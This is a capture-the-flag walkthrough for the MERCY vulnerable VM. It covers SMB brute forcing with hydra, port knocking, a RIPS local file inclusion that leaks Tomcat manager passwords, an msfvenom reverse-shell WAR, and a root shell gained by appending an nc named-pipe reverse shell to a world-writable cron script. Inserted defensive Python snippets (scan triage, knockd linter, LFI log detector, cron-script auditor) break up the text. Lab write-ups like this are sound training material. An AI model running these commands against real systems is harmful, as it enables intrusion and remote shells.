digitalworld.local: MERCY Vulnerable VM Walkthrough

0x01 Introduction

MERCY is a vulnerable VM built with PWK-course-style security practice in mind. MERCY is also the name of a game, which has nothing to do with this vulnerable VM. The goal of this exercise is to attack the target, obtain root privileges, and read the proof.txt file in the system's root directory.

Download address for the VM:

https://drive.google.com/uc?id=1YzsW1lCKjo_WEr6Pk511DXQBFyMMR14y&export=download (verify that the sha256 value of MERCY.mf in the downloaded image is correct)

0x02 Information gathering

1. Live host scan

root@kali:~# arp-scan -l

192.168.1.12 turns out to be the target machine.

2. Port scan

Scan the target's ports with Nmap:

root@kali:~# nmap -A 192.168.1.12

Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 09:55 EST
Nmap scan report for 192.168.1.12
Host is up (0.00091s latency).
Not shown: 990 closed ports
PORT     STATE    SERVICE     VERSION
22/tcp   filtered ssh
53/tcp   open     domain      ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.9.5-3ubuntu0.17-Ubuntu
80/tcp   filtered http
110/tcp  open     pop3?
139/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp  open     imap        Dovecot imapd
|_ssl-date: TLS randomness does not represent time
445/tcp  open     netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp  open     ssl/imap    Dovecot imapd
|_imap-capabilities: CAPABILITY
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after:  2028-08-23T13:22:55
|_ssl-date: TLS randomness does not represent time
995/tcp  open     ssl/pop3s?
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after:  2028-08-23T13:22:55
|_ssl-date: TLS randomness does not represent time
8080/tcp open     http        Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_  Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
MAC Address: 00:0C:29:91:A0:C6 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: MERCY; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s
|_nbstat: NetBIOS name: MERCY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: mercy
|   NetBIOS computer name: MERCY\x00
|   Domain name: \x00
|   FQDN: mercy
|_  System time: 2019-02-12T22:57:54+08:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-02-12 09:57:54
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   0.91 ms 192.168.1.12

OS and Service detection performed. Please report any incorrec

The scan shows ports 445, 8080 and several others open, while 22 and 80 are filtered by a firewall. The Samba service is running, and it is the main target of this write-up.
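As an added example (not part of the original write-up), the following Python turns the scan above into the short list of hardening findings a defender would raise from it: it parses the port table and flags the filtered ports, the exposed Samba and Tomcat services, the risky HTTP methods and the disabled SMB signing. NMAP_OUTPUT is a constructed excerpt of the scan output shown above.

```python
import re

# Constructed excerpt of the nmap -A output above (port table plus the two
# script lines the findings depend on). The parser is an added example, not
# the article's code and not part of nmap.
NMAP_OUTPUT = """\
PORT     STATE    SERVICE     VERSION
22/tcp   filtered ssh
53/tcp   open     domain      ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)
80/tcp   filtered http
110/tcp  open     pop3?
139/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp  open     imap        Dovecot imapd
445/tcp  open     netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp  open     ssl/imap    Dovecot imapd
995/tcp  open     ssl/pop3s?
8080/tcp open     http        Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_  Potentially risky methods: PUT DELETE
|_  message_signing: disabled (dangerous, but default)
"""

# port/proto  state  service  [version...]
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_ports(text):
    """Return {port: (state, service, version)} from an nmap port table."""
    ports = {}
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port, _proto, state, service, version = m.groups()
            ports[int(port)] = (state, service, (version or "").strip())
    return ports


def triage(text):
    """Turn the scan into defender-side findings, one string per item."""
    ports = parse_ports(text)
    findings = []
    filtered = sorted(p for p, (state, _, _) in ports.items() if state == "filtered")
    if filtered:
        findings.append(
            f"filtered ports {filtered}: a host firewall is in play, make sure the "
            "rule set (allow-lists or port knocking) is documented and reviewed")
    for port, (state, _service, version) in ports.items():
        if state == "open" and "Tomcat" in version:
            findings.append(f"port {port}: Tomcat exposed, restrict /manager to trusted "
                            "networks and use strong, unique credentials")
        if state == "open" and "Samba" in version:
            findings.append(f"port {port}: Samba exposed, disable guest access and "
                            "anonymous share listing")
    if re.search(r"Potentially risky methods:.*\bPUT\b", text):
        findings.append("HTTP PUT/DELETE advertised: disable unless WebDAV is required")
    if re.search(r"message_signing: disabled", text):
        findings.append("SMB message signing disabled: set 'server signing = mandatory' in smb.conf")
    return findings


if __name__ == "__main__":
    for item in triage(NMAP_OUTPUT):
        print("-", item)
```

Feed it the full `nmap -A` text and it ignores everything that is not a port line or one of the two script lines it looks for.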

0x03 Exploitation

Whatever the circumstances, the first application we go after is Apache Tomcat (http://192.168.1.12:8080/).

We try to reach the Tomcat manager page, but it requires a valid username and password, and none of the usual guesses get us in. Note that the user configuration lives in /etc/tomcat7/tomcat-users.xml.

1. Attacking Samba

Use smbclient to list the Samba shares available on the target.

root@kali:~# smbclient -NL 192.168.1.12

The output shows several share names. Next we try to mount a share locally, but access is still denied: authentication is required.

root@kali:~# mkdir /mnt/file

root@kali:~# mount -t cifs //192.168.1.12/qiu /mnt/file

2. Enumerating Samba accounts with enum4linux

root@kali:~# enum4linux -U -o 192.168.1.12

Add the enumerated accounts (qiu and pleadformercy) to mercy.txt and brute-force their passwords.

3. Samba account brute force

root@kali:~# hydra -L mercy.txt -P /usr/share/wordlists/fasttrack.txt smb://192.168.1.12:139

qiu's account is cracked: the password is empty.

4. Mounting the share with mount

root@kali:~# mount -t cifs //192.168.1.12/qiu /mnt/file -o username=qiu

List the files under the mount point.

5. Collecting information from the .private directory

The .private directory turns out to contain important system information.

root@kali:~# cd /mnt/file/
root@kali:/mnt/file# cd .private
root@kali:/mnt/file/.private# ls
opensesame  readme.txt  secrets
root@kali:/mnt/file/.private# cd opensesame/
root@kali:/mnt/file/.private/opensesame# ls
config  configprint
root@kali:/mnt/file/.private/opensesame# head -30 config
Here are settings for your perusal.

Port Knocking Daemon Configuration

[options]
       UseSyslog

[openHTTP]
       sequence    = 159,27391,4
       seq_timeout = 100
       command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
       tcpflags    = syn

[closeHTTP]
       sequence    = 4,27391,159
       seq_timeout = 100
       command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
       tcpflags    = syn

[openSSH]
       sequence    = 17301,28504,9999
       seq_timeout = 100
       command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
       tcpflags    = syn

[closeSSH]
       sequence    = 9999,28504,17301
       seq_timeout = 100
       command     = /sbin/iptables -D iNPUT -s %IP% -p tcp --dport 22 -j ACCEPT
       tcpflags    = syn

The listing above is the port-knocking daemon's configuration, with the iptables commands it runs to open and close firewall ports.
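Added example, not from the article and not part of knockd: a small linter for a knockd configuration like the one recovered above. It parses the INI-style file, checks that every open rule has a close rule that deletes exactly the rule the open rule inserts, that commands are scoped to the knocking source with %IP%, that sequences are at least three valid ports, and that the iptables chain name is a real builtin chain. Run on the config above it flags closeSSH, whose command names the chain iNPUT: iptables chain names are case-sensitive, so that close command fails and port 22 stays open for the knocking address until the rule is removed by hand. KNOCKD_CONF is a constructed copy of the recovered config.

```python
import re

# Constructed copy of the knockd configuration shown above. The linter below is
# an added example, not the article's code and not part of knockd.
KNOCKD_CONF = """\
[options]
       UseSyslog
[openHTTP]
       sequence    = 159,27391,4
       seq_timeout = 100
       command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
       tcpflags    = syn
[closeHTTP]
       sequence    = 4,27391,159
       seq_timeout = 100
       command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
       tcpflags    = syn
[openSSH]
       sequence    = 17301,28504,9999
       seq_timeout = 100
       command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
       tcpflags    = syn
[closeSSH]
       sequence    = 9999,28504,17301
       seq_timeout = 100
       command     = /sbin/iptables -D iNPUT -s %IP% -p tcp --dport 22 -j ACCEPT
       tcpflags    = syn
"""

# Builtin chains of the filter table; iptables compares chain names case-sensitively.
BUILTIN_CHAINS = {"INPUT", "OUTPUT", "FORWARD"}


def parse_knockd(text):
    """Parse the INI-style knockd file into {section: {key: value}}."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections[current] = {}
        elif current is not None and "=" in line:
            key, value = (s.strip() for s in line.split("=", 1))
            sections[current][key] = value
        elif current is not None:
            sections[current][line] = True  # bare flag such as UseSyslog
    return sections


def lint_knockd(text):
    """Return a list of (section, problem) pairs a reviewer should look at."""
    conf = parse_knockd(text)
    problems = []
    for name, rule in conf.items():
        if name == "options":
            continue
        seq = [int(p) for p in rule.get("sequence", "").split(",") if p.strip()]
        if len(seq) < 3:
            problems.append((name, "knock sequence shorter than 3 ports is easy to hit by accident"))
        if any(not 1 <= p <= 65535 for p in seq):
            problems.append((name, "sequence contains a port outside 1-65535"))
        cmd = rule.get("command", "")
        m = re.search(r"iptables\s+-[IAD]\s+(\S+)", cmd)
        if m and m.group(1) not in BUILTIN_CHAINS:
            problems.append((name, f"iptables chain '{m.group(1)}' is not a builtin chain "
                                   "(chain names are case-sensitive), the command will fail"))
        if "%IP%" not in cmd:
            problems.append((name, "command is not limited to the knocking source (%IP%)"))
        # Every open rule needs a close rule that deletes the very rule it inserts.
        if name.startswith("open"):
            close = conf.get("close" + name[4:])
            if close is None:
                problems.append((name, "no matching close rule, the port stays open once knocked"))
            elif close.get("command", "").replace("-D", "-I", 1) != cmd:
                problems.append((name, "close rule does not delete exactly the rule the open rule inserts"))
    return problems


if __name__ == "__main__":
    for section, problem in lint_knockd(KNOCKD_CONF):
        print(f"[{section}] {problem}")
```

A sequence that never closes is worth checking on any knockd host: the open rule inserts an ACCEPT at the top of INPUT for the knocker's address, and only a working close command (or a reboot) takes it back out.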

6. Opening the firewall ports on the target

There are two pairs of sequences, one for HTTP and one for SSH.

(1) Sequence script for HTTP:

knock.sh

#!/bin/bash
for PORT in 159 27391 4; do
    nmap -Pn 192.168.1.12 -p $PORT
done

(2) Sequence script for SSH:

knock1.sh

#!/bin/bash
for PORT in 17301 28504 9999; do
    nmap -Pn 192.168.1.12 -p $PORT
done

(3) Run the sequence script to open the HTTP port:

root@kali:~# ./knock.sh

Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:50 EST
Nmap scan report for 192.168.1.12
Host is up (0.00044s latency).
PORT    STATE  SERVICE
159/tcp closed nss-routing
MAC Address: 00:0C:29:91:A0:C6 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds

Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:50 EST
Nmap scan report for 192.168.1.12
Host is up (0.00053s latency).
PORT      STATE  SERVICE
27391/tcp closed unknown
MAC Address: 00:0C:29:91:A0:C6 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds

Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:50 EST
Nmap scan report for 192.168.1.12
Host is up (0.00042s latency).
PORT  STATE  SERVICE
4/tcp closed unknown
MAC Address: 00:0C:29:91:A0:C6 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds

(4) Run the sequence script to open the SSH port:

root@kali:~# ./knock1.sh

Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:58 EST
Nmap scan report for 192.168.1.12
Host is up (0.00049s latency).
PORT      STATE  SERVICE
17301/tcp closed unknown
MAC Address: 00:0C:29:91:A0:C6 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds

Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:58 EST
Nmap scan report for 192.168.1.12
Host is up (0.00042s latency).
PORT      STATE  SERVICE
28504/tcp closed unknown
MAC Address: 00:0C:29:91:A0:C6 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds

Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:58 EST
Nmap scan report for 192.168.1.12
Host is up (0.00031s latency).
PORT     STATE  SERVICE
9999/tcp closed abyss
MAC Address: 00:0C:29:91:A0:C6 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds

The commands above opened ports 80 and 22; now we can open the port-80 website from Kali.

7. Directory scan

Scanning the target's port-80 website with the directory tool dirb reveals a robots.txt file.

root@kali:~# dirb http://192.168.1.12

Opening the link from robots.txt reveals an interesting directory, /nomercy.

Browsing that directory shows that RIPS 0.53 is installed.

8. RIPS vulnerability research

According to EDB-ID 18660, RIPS 0.53 is affected by a local file inclusion (LFI) vulnerability (RIPS 0.53 LFI).

Search exploit-db for RIPS 0.53:

https://www.exploit-db.com/exploits/18660

Its PoC is:

http://localhost/rips/windows/code.php?file=../../../../../../etc/passwd

The local file inclusion lets us read the target's /etc/passwd.

9. Tomcat, second attempt

Use the RIPS LFI to include tomcat-users.xml and read its configuration.

http://192.168.1.12/nomercy/windows/code.php?file=./../../../../..//etc/tomcat7/tomcat-users.xml

This file leaks the usernames and passwords of the Tomcat manager running on port 8080:

<user username="thisisasuperduperlonguser" password="heartbreakisinevitable" roles="admin-gui,manager-gui"/>
<user username="qiu" password="mercyplz" roles="manager-gui"/>
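Added example (not the article's code and not part of RIPS): detection logic for the kind of LFI request used above, run over a few constructed Apache access-log lines. It decodes the query string (twice, to catch double URL-encoding), looks for directory traversal and for well-known sensitive targets such as /etc/passwd and tomcat-users.xml, and rates a hit as high when the server answered 200. The log lines, the client addresses and the SENSITIVE list are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-log lines. The first two mirror the requests shown
# above, the third is a URL-encoded variant, the last two are benign traffic.
ACCESS_LOG = [
    '192.168.1.21 - - [12/Feb/2019:13:02:11 -0500] "GET /nomercy/windows/code.php?file=../../../../../../etc/passwd HTTP/1.1" 200 1843',
    '192.168.1.21 - - [12/Feb/2019:13:05:40 -0500] "GET /nomercy/windows/code.php?file=./../../../../..//etc/tomcat7/tomcat-users.xml HTTP/1.1" 200 2210',
    '192.168.1.21 - - [12/Feb/2019:13:06:02 -0500] "GET /nomercy/windows/code.php?file=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1" 200 0',
    '192.168.1.30 - - [12/Feb/2019:13:07:15 -0500] "GET /nomercy/windows/code.php?file=index.php HTTP/1.1" 200 512',
    '192.168.1.30 - - [12/Feb/2019:13:07:16 -0500] "GET /index.html HTTP/1.1" 200 1024',
]

# client ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3}) (\S+)')

# Files an LFI is typically aimed at; traversal alone is already reportable.
SENSITIVE = ("/etc/passwd", "/etc/shadow", "tomcat-users.xml", "/proc/self")


def classify(line):
    """Return None for a benign line, else a dict describing the suspected LFI."""
    m = LOG_RE.match(line)
    if not m:
        return None
    src, ts, _method, target, status, _size = m.groups()
    if "?" not in target:
        return None
    path, query = target.split("?", 1)
    decoded = unquote(unquote(query))  # undo single and double URL-encoding
    traversal = "../" in decoded or "..\\" in decoded
    sensitive = [s for s in SENSITIVE if s in decoded]
    if not (traversal or sensitive):
        return None
    return {
        "src": src,
        "time": ts,
        "path": path,
        "query": decoded,
        "status": int(status),
        "sensitive": sensitive,
        # a 200 on a sensitive file means the include most likely succeeded
        "severity": "high" if status == "200" and sensitive else "medium",
    }


def scan_log(lines):
    """Run classify over every line and keep the hits, in log order."""
    return [hit for hit in map(classify, lines) if hit]


if __name__ == "__main__":
    for hit in scan_log(ACCESS_LOG):
        print(hit["severity"], hit["src"], hit["path"], hit["query"])
```

Grouping hits by source address and counting distinct sensitive targets per source is the usual next step for alerting; a single client walking through /etc/passwd and an application's credential file within minutes is the pattern the write-up itself produces.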

With login credentials in hand we can sign in to the manager webapp and deploy a malicious webapp: a WAR file that gives us a reverse shell.

Log in to the manager:

http://192.168.1.12:8080/manager/html

The target is a 32-bit Ubuntu system.

We can generate such a WAR with msfvenom:

root@kali:/opt# msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.21 LPORT=3333 -f war -o shell.war

Deploy the backdoor webapp shell.war.

Listing the WAR with 7z shows that it contains the file yillzdtgvccxzwp.jsp:

root@kali:/opt# 7z l shell.war

To trigger the malicious web application, enter the following in the browser address bar:

http://192.168.1.12:8080/shell/yillzdtgvccxzwp.jsp

On the attacking machine run an nc listener for the reverse connection, then use python to get an interactive shell: python -c 'import pty; pty.spawn("/bin/sh")'

root@kali:/opt# nc -lvvp 3333

View the flag as the unprivileged user:

MERCY:/$ cat local.txt
Plz have mercy on me! :-( :-(
MERCY:/$

0x04 Privilege escalation

The account qiu found in tomcat-users.xml can be used to log in. During information gathering we also found a way to escalate to root: the script /home/qiu/.private/secrets/timeclock runs as root every three minutes and writes to /var/www/html/time.

MERCY:/$ su qiu
qiu@MERCY:~/.private/secrets$ ls -al /home/qiu/.private/secrets/timeclock
-rwxrwxrwx 1 root root 222 Aug 31 00:47 /home/qiu/.private/secrets/timeclock
qiu@MERCY:~/.private/secrets$ cat timeclock
#!/bin/bash
now=$(date)
echo "The system time is: $now." > ../../../../../var/www/html/time
echo "Time check courtesy of LINUX" >> ../../../../../var/www/html/time
chown www-data:www-data ../../../../../var/www/html/time
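Added example, not part of the original write-up: an audit function for scripts that a scheduler runs as root, which is exactly the weakness here (a root-owned, root-executed script with mode -rwxrwxrwx). It checks the file's mode, its owner, whether it is a symlink, and whether the parent directory is writable by others, since a file that can be replaced is as bad as one that can be edited. demo() builds a temporary directory with one script in the same 0777 mode as timeclock, one with a sane 0755 mode, and one dangling path; all of those paths are constructed, and the function takes whatever paths the caller collects from crontabs or timers.

```python
import os
import stat
import tempfile

# Audit of scripts executed as root by cron, systemd timers or knockd-style
# daemons. Added example, not the article's code; paths come from the caller.


def audit_root_script(path):
    """Return a list of problems for one script path (empty list means clean)."""
    problems = []
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return ["missing (a dangling scheduler entry can be hijacked by creating the file)"]
    if stat.S_ISLNK(st.st_mode):
        problems.append("is a symlink, whoever controls the target controls what root runs")
    mode = stat.S_IMODE(st.st_mode)
    if mode & stat.S_IWOTH:
        problems.append("world-writable (like -rwxrwxrwx): any local user can append commands")
    elif mode & stat.S_IWGRP:
        problems.append("group-writable: every member of the group can edit it")
    if st.st_uid != 0:
        problems.append(f"owned by uid {st.st_uid}, not root")
    # A writable parent directory lets a user rename the script away and drop
    # in a new one, even when the file itself is read-only.
    parent = os.path.dirname(os.path.abspath(path))
    pmode = stat.S_IMODE(os.stat(parent).st_mode)
    if pmode & stat.S_IWOTH and not pmode & stat.S_ISVTX:
        problems.append("parent directory is world-writable without the sticky bit")
    return problems


def audit_many(paths):
    """Map each path to its list of problems."""
    return {p: audit_root_script(p) for p in paths}


def demo():
    """Constructed scenario: a 0777 script like timeclock, a 0755 one, a missing one."""
    d = tempfile.mkdtemp()
    bad = os.path.join(d, "timeclock")
    good = os.path.join(d, "rotate-logs")
    missing = os.path.join(d, "does-not-exist")
    for p in (bad, good):
        with open(p, "w") as fh:
            fh.write("#!/bin/bash\necho ok\n")
    os.chmod(bad, 0o777)   # the mode the ls -al output above shows
    os.chmod(good, 0o755)  # writable by the owner only
    return audit_many([bad, good, missing])


if __name__ == "__main__":
    for path, problems in demo().items():
        print(path, "->", problems or ["ok"])
```

The fix on the real host is the usual one: the script and its parent directory owned by root with mode 0755 or tighter, and the scheduler entry pointing at an absolute path.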

Append the following command to the timeclock script; the IP address nc connects to is the attacking machine's (Kali) address.

qiu@MERCY:~/.private/secrets$ echo "rm -rf /tmp/p; mknod /tmp/p p; /bin/sh 0</tmp/p | nc 192.168.1.21 5555 1>/tmp/p" >> timeclock

qiu@MERCY:~/.private/secrets$ cat timeclock
#!/bin/bash
now=$(date)
echo "The system time is: $now." > ../../../../../var/www/html/time
echo "Time check courtesy of LINUX" >> ../../../../../var/www/html/time
chown www-data:www-data ../../../../../var/www/html/time
rm -rf /tmp/p; mknod /tmp/p p; /bin/sh 0</tmp/p | nc 192.168.1.21 5555 1>/tmp/p

Start another nc listener on port 5555; after three minutes a root shell on the target will connect back. Once the listener on the attacking machine receives the connection, use python to get an interactive shell: python -c 'import pty; pty.spawn("/bin/sh")'

root@kali:/mnt/file/.private/opensesame# nc -lvvp 5555
listening on [any] 5555 ...
192.168.1.12: inverse host lookup failed: Unknown host
connect to [192.168.1.21] from (UNKNOWN) [192.168.1.12] 39346
python -c "import pty;pty.spawn('/bin/bash')"

0x05 Reading the flag

Change to the root directory and read proof.txt to get the flag.

root@MERCY:~# cd /root
root@MERCY:~# ls
author-secret.txt  config  proof.txt
root@MERCY:~# cat proof.txt
Congratulations on rooting MERCY. :-)
root@MERCY:~#

Original article: https://www.cnblogs.com/backlion/p/10368920.html

Posted: 2024-10-18 20:18:41
